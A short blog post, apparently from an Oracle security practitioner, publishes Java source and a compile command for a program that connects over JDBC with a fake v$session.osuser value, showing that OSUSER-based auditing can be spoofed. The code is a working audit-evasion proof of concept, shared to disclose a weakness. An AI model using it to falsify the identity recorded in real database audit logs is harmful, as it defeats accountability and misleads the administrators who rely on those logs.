In my previous post I discussed using OSUSER for auditing user access. To spoof OSUSER I wrote a short program in Java, but I didn’t publish a source code. I was planning to do it for quite some time now, especially that Pete Finnigan expressed interest in seeing it. Martin also hassled me for the past few months, and here is the Java code I used.
To compile it I used java 1.6 and Oracle jdbc 11.2.0.1 driver:
javac -cp ../lib/ojdbc6.jar:. OraAccess.java
OraAccess.java source file
import java.util.Properties;
import java.sql.*;
import java.io.Console;
import java.io.IOException;
public class OraAccess{
public static Connection getConnection(String db_address, String db_name, String db_username,
String db_pass, String new_osuser){
Properties props = new Properties();
props.put("user", db_username);
props.put("password", db_pass);
props.put("v$session.osuser", new_osuser);
props.put("v$session.program", "UserSpoofTest");
Connection con = null;
try {
con = DriverManager.getConnection("jdbc:oracle:thin:@"+ db_address +":" + db_name +"",props);
} catch(SQLException ex) {
System.err.println("SQLException: " + ex.getMessage());
}
return con;
}
public static void main(String[] args) throws SQLException, IOException {
Console c = System.console();
if (c == null) {
System.err.println("No console.");
System.exit(1);
}
String username;
username = System.getProperty("user.name");
System.out.print("Your current operating system username is: ");
System.out.println(username);
String database_address = c.readLine("Enter database server IP and port number (IP:port): ");
String database_name = c.readLine("Enter database name: ");
String db_username = c.readLine("Enter database username: ");
String db_password = c.readLine("Enter password for user \"" + db_username +"\": ");
String fake_osuser = c.readLine("Enter fake osuser name: ");
Connection conn = getConnection(database_address, database_name, db_username, db_password, fake_osuser);
String end_connection = c.readLine("Enter something to disconnect.");
conn.close();
}
}
